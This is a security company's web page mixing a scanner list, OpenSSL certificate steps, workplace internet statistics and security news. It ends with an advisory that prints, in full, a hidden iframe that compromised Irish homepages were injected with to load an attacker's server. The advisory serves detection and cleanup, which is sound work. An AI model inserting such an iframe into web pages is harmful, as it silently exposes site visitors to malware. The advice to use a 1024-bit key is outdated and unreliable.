Web Security

Website Security. Is your website secure, do you know how to secure your website. At Security I Trust we provide free It Security advice for website security

Top Website Security Vulnerability Tools

 

Need to check out your website and see if it secure our list contains some of the top website vulnerability scanners

  1.  NikTo 2 Open Source web security application scanner
  2. Paros Proxy Used to evaluate the security of web application
  3. Burp Suite is an integrated platform for attacking web applications
  4. Web Scarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols
  5. Grendel-Scan is an open-source web application security testing tool
  6. Web Inspect is a powerful Web Application Scanner from HP
  7. Wikto, which apparently borrowed its name from Nikto (a Unix-based assessment tool)
  8. Acunetix Web Vulnerability Scanner: Acunetix has pioneered the web application security scanning technology

In IIS7 if you want to add 2 or more web sites to the one web server using different domain name and different SSL certificates you need to assign more than one IP address to your server. Each website on IIS that you want to bind an SSL cert to must have its unique IP address.

Generating a Private Key and CSR for Linux Web Server

This is the instruction for generating a CSR on a apache web server
(Note: you need to be logged in a root for this process)

Openssl is used to generate an RSA Private Key and CSR file. You can also use it to generate self-signed certificates which can be used for testing or internal usage.

Openssl should be installed in the /usr/local/ssl/bin directory.

The first step is to create your RSA Private Key. This key that we will create will be a 1024 bit RSA key, encrypted using Triple-DES and stored in a PEM format so that it is readable as ASCII text. We will use several files as random seed enhancers which will help to make the key more secure. Text files that have been compressed with a utility such as gzip are good choices. The key is generated using the following command, where file1:file2:etc represents the random compressed files.


# openssl genrsa -des3 -rand file1:file2:file3:file4:file5 -out server.key 1024

You will be prompted for a pass-phrase. It is critical that you keep this pass-phrase secure. If you loos the key, or forget pass-phrase then the certificate will be useless.
One issue with using pass-phrased private key is that Apache will ask for the pass-phrase every time the web server is started. This may not always be convenient as someone may not always be around to type in the pass-phrase after a reboot or crash.
mod_ssl includes the ability to use an external program in place of the built-in pass-phrase dialog, however, this is not necessarily the most secure option either. The other option would be to remove the Triple-DES encryption from the key, thereby no longer needing to type in a pass-phrase. If you remove the encryption from the private key it is critical that the file is readable by the root user only. If your system is ever compromised and a third party obtains your unencrypted private key, the corresponding certificate will need to be revoked.

This command will remove the pass-phrase from the key:


# openssl rsa -in server.key -out server.pem

Once the private key is generated you need to generate a CSR (Certificate Signing Request). The CSR is:

  1. sent to a Certificate Authority who will verify the identity of the requestor and issue a signed certificate.
  2. The second option is to self-sign the CSR, which will be demonstrated in the next section.

During the generation of the CSR you will be prompted for several pieces of information, this is the X.509 attributes of the certificate. One of the prompts will be for "Common Name", it is important that this field be filled in with the fully qualified domain name of the server to be protected by SSL. If the URL of website to be protected is https://www.webserver.com, then enter www.webserver.com at this prompt.
This is the command to generate the CSR:

# openssl req -new -key server.key -out server.csr

You will be asked to enter the PEM pass phrase.

Country Name (2 letter code) [XX]:IE
State or Province Name (full name) []:Kilkenny
Locality Name (eg, city) [Default City]:Kilkenny
Organization Name (eg, company) [Default Company Ltd]: Security I Trust
Organizational Unit Name (eg, section) []:InfoSec
Common Name (eg, your name or your server's hostname) []: securityitrust.com
Email Address []:  support@your_email_address.com

Please enter the following 'extra' attributes to be sent with your certificate request
A challenge password []: I7nf9oS5
An optional company name []: Security I Trust

 

At this point you have 2 option.
1. You can use your CSR to purchase a signed SSL certificate. If this is your plan then you need to  upload the CSR to the vendors website and when you have received the certificate from the vendor you need to install the private key and certificate on your web server.

2. Generate a self signed certificate.
 

  • Non-work related Internet surfing results in up to a 40% loss in productivity each year- Gartner Group
  • 85.6% of employees use office email for personal reasons- NFO Worldwide
  • 70% of all web traffic to Internet pornography sites occurs during the work hours – Sex Tracker
  • 92% of online stock trading occurs from the workplace during work hours.
  • 64% of employees have received politically incorrect or offensive emails at work- Business Week
  • 30% of employees watch sports online while at work.
  • 24% of employees admit to shopping online while at work.
  • Employees use company Internet access to visit sites more frequently at work than they do at home because of the high-speed Internet access at work.-Nielsen Ratings
  • 30 to 40% of Internet use in the workplace is not related to business.- IDC Research
  • 37% of workers say they surf the Web constantly at work- Vault.com
  • 77.7% of major U.S. companies keep tabs on employees by checking their e-mail, Internet, phone calls, computer files, or by videotaping them at work- American Management Association
  • 63% of companies monitor workers' Internet connections and 47% store and review employee e-mail – American Management Association
  • 27% of companies say that they've fired employees for misuse of office e-mail or Internet connections, and 65% report some disciplinary measure for those offenses – American Management Association
     

Spotify has apologized for an attack that exposed users of the free version of its music streaming service in Europe to malware through tainted  advertisements.  The ads served content that attempted to infect users' machines with scareware.  Spotify disabled third-party advertisements on Friday, March 25 after learning of the problem.  The company isolated and removed the offending ad, and service was back to normal in the next few days.

Two UK ISPs are challenging the country's Digital Economy Act. They want the English High Court to determine the legislation's legality before the Digital Economy Act takes effect. The ISPs claim that this bill was rushed through Parliament just prior to the general election and therefore received "insufficient scrutiny;" there was not adequate time to hash out the bill's content or the implications of its provisions. The bill requires that ISPs disconnect persistent illegal file sharers from the Internet and allows copyright holders to block access to sites that host illegal content. The bill does have a measure that would require additional legislation and consultation before the disconnect provision could be implemented.

Europe's e-commerce directive established that ISPs are merely conduits and are not to be held liable for the traffic's content.

Read the full story

Google Chrome suspected of having Multiple Security Vulnerabilities

Affected version: Google Chrome prior to 5.0.375.99

Chrome is susceptible to have multiple security vulnerabilities.

  • 4 of the vulnerabilities potentially have to do with memory corruption, so it is possible that some of them can be used for code execution.
  • 3 of the bugs specifically relate to Chrome's handling of SVG and PNG images, CSS style sheets.
  • The other one is related to Chrome's bidi algorithm. 

Status: vendor confirmed, updates available

References: Vendor Home Page http://www.google.com

Google Chrome Stable Channel Update http://googlechromereleases.blogspot.com/2010/07/stable-channel-update.html

SecurityFocus BID http://www.securityfocus.com/bid/41334/

ALERT: THE HIDDEN DANGERS BEHIND YOUR FAVORITE SEARCH ENGINE. Hackers are exploiting search engines to infect your PCs and smart phones – do not let your company become the next victim. Join SANS for an educational webcast on May 26 – keynote by Peter Firstbrook, GARTNER.
Register here: http://www.sans.org/info/59023

According to various reports, in the past few days a large number of websites created using WordPress have been hacked. . Unconfirmed reports by WPSecurityLock suggest that other PHP-based management systems, such as the Zen Cart eCommerce solution, have also been targeted.

The hacked web pages appear to have been infected with scripts, which not only install malware on users’ systems, but also prevent browsers like Firefox and Google Chrome, which use Google’s Safe Browsing API, from issuing an alert when users try to access the page. When Google’s search bot encounters such a specially crafted page, the page responds by simply returning harmless code. This camouflage strategy takes advantage of the browser switch normally used by developers to return browser specific code to suit functional variations in different browser, such as Internet Explorer and Firefox.

Experts are currently still puzzled over which hole was actually exploited for the large-scale attack. The only thing that seems certain at this point is that the problem didn’t originate in WordPress, because if this was the case considerably more pages would have been infected. It is still unknown which version of wordpress are been attacked.

At “Security I Trust” we have noticed a large increase in the number of Irish websites that are being compromise by hackers. In the majority of cases the hackers have only inserted code into the home page of a website. Many Irish website owners have been completely unaware that their website has been compromised and they only found out when their PC was already affected.

The following code is appearing recently on the homepage of many Irish website:

<html><body><iframe src=”http://tvnameshop.cn:8080/ts/in.cgi?pepsi19? width=12 height=12 style=”visibility: hidden”></iframe></body></html>

The above iframes URL is using a “.cn” extension to make you think that it is a Chinese hacking group but from our investigation we have traced this link to a server located in Germany. This German server appears to reroute the connection to a server located in the Czech Republic.

What can website owners do?

If they are concerned about their website being a victim they can open their web pages in a web browser and search for any iframes code, tvnameshop.cn, or fuckingl33t.eu reference. If you do not understand web code you are advised to ask a web programmer to assist you. To repair your website you need to remove the code that the hackers have added to your website.

So what are these hackers doing?

When your customer come to your website it will appear normal, but in the background when your homepage loads in the browser of the person viewing your website the hacker’s hidden code will also make a connection out to the hackers server and run several hidden script against the users PC.  These hidden scripts could be used to steal information from the users PC or even install malware or other tools on your PC. The primary danger for the website owner is that it will appear as if his website was responsible for the attack against the user.

Niall O’Farrell
Managing Director
www.securityitrust.com